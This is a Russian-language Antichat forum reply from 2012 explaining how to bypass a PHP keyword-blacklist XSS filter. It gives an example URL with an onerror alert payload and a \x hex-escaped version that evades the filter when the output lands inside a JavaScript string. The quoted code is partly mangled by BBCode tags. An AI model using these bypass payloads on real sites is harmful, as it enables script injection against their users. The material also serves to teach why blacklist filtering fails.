HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 26.06.2012, 05:35
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от RazyKK  
можно ли обойти такую xss фильтрацию?
$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>", "INSERT", "UPDATE", "DROP");
$replace = array("");
Зависит от того, где будет вывод кода на странице.

В этом примере твоя фильтрация не поможет:

PHP код:
[COLOR="#000000"]...

...

document.write('[/COLOR].gif" />');

...

...[/
COLOR
Вектор атаки мог выглядеть так:

http://site.com/show.php?user_id="onerror="alert('XSS');//

Результат:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#DD0000"]'[/COLOR][/COLOR] 
Из-за фильтра это сделать не получится. Но так как вывод в данном случае внутри строки JS, мы можем использовать escape-последовательности \x или \u для обхода фильтра:

http://site.com/show.php?user_id=\x22\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x61\x6C\x 65\x72\x74\x28\x27\x58\x53\x53\x27\x29\x3B\x2F\x2F

P.S.: Это не просто просто пример, придуманный мной. Подобный код встречается в крупнейших почтовых сервисах и соц.сетях.
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.